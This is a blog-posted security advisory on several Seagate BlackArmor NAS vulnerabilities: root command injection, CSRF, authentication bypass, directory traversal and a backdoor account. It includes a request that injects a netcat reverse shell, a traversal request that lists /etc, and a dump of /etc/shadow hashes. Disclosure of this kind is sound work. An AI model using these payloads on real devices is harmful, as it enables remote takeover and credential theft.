Wednesday, February 25, 2015

[Exploit] Seagate BlackArmor Network Storage System


Seagate BlackArmor Business Storage Network Storage System

Vulnerability: Command Injection
CVE: CVE-2014-2701

Description
The Seagate BlackArmor network storage system is susceptible to a root command injection vulnerability, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /index.php/mv_system/send_test_email
POST Data - email_recipients=%3Crecipients%3E%3Crecipient%3E%3Cemail%3E`nc 192.168.1.177 80 -e /bin/sh`%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E

Attack Requirements
- Authenticated session or valid user credentials (Auth can be bypassed due to broken session management.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but due to broken session management, a remote adversary is able to call the “/index.php/mv_system/send_test_email” program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit.

This exploit should work against other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/seagate_root_cmd_inject.py




Vulnerability: Cross-Site Request Forgery
CVE: Pending

Description
The Seagate BlackArmor is susceptible to several Cross-Site Request Forgery attacks, which allows an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms severed by the Seagate BlackArmor are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations
- Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass/Broken Session Management)
CVE: Pending

Description
The Seagate BlackArmor network storage system is susceptible to Missing Function Level Access Control (Authentication bypass due to broken session management) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Seagate session cookies are generated using user information and then encrypted. The resulting value is then used to keep track of a particular individuals application state. This cookie can be configured with an infinite expiration time, which results in generated cookies lasting forever. To demonstrate this issue, ISE used a permanently authenticated session cookie in conjunction with CVE-2014-2701 to execute operating system commands.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- This vulnerability is demonstrated in conjunction with CVE-2014-2701.




Vulnerability: Directory Traversal
CVE: CVE-2014-2702

Description
The Seagate BlackArmor network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to access protected system locations.

Attack Requirements
- Authenticated session or valid user credentials (Authentication Bypass/Broken Session Management)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access protected data, which could lead to elevated privileges.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “/index.php/mv_backup/get_backup_from_location” require authentication. An attacker can circumvent this by utilizing methods described by Missing Function Level Access Control (Authentication Bypass/Broken Session Management).


—Directory Listing—

POST /index.php/mv_backup/get_backup_from_location
POST Data - task_type=nas_nas&path=%2Fetc&test_connection=+





Vulnerability: Undocumented System User (Backdoor User)
CVE: Pending

Description
The Seagate BlackArmor network storage system contains an undocumented system user. This users password is the only Seagate system user whose password is protected by the insecure decrypt algorithm.

Details
- This user should be present in other Seagate Network Storage Systems.
- This user can be used to access the Seagate network storage system.

Impact
- Unknown - An attacker could gain system access by leveraging undocumented user accounts.

Vendor Recommendations
- Remove undocumented user accounts.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept

cat /etc/shadow

root:aL86k2VEuV4cY:16378:0:99999:7:::
devuser:x:16378:0:99999:7:::
avahi-autoipd:!:16378:0:99999:7:::
ftp:!:16378:0:99999:7:::
w41t980ck4pu63r:CsRCvByKdCO.c:16378:0:99999:7:::
admin:F1PYtWpQ/pGGY:16378:0:99999:7:::






Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure - 2/25/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

No comments:

Post a Comment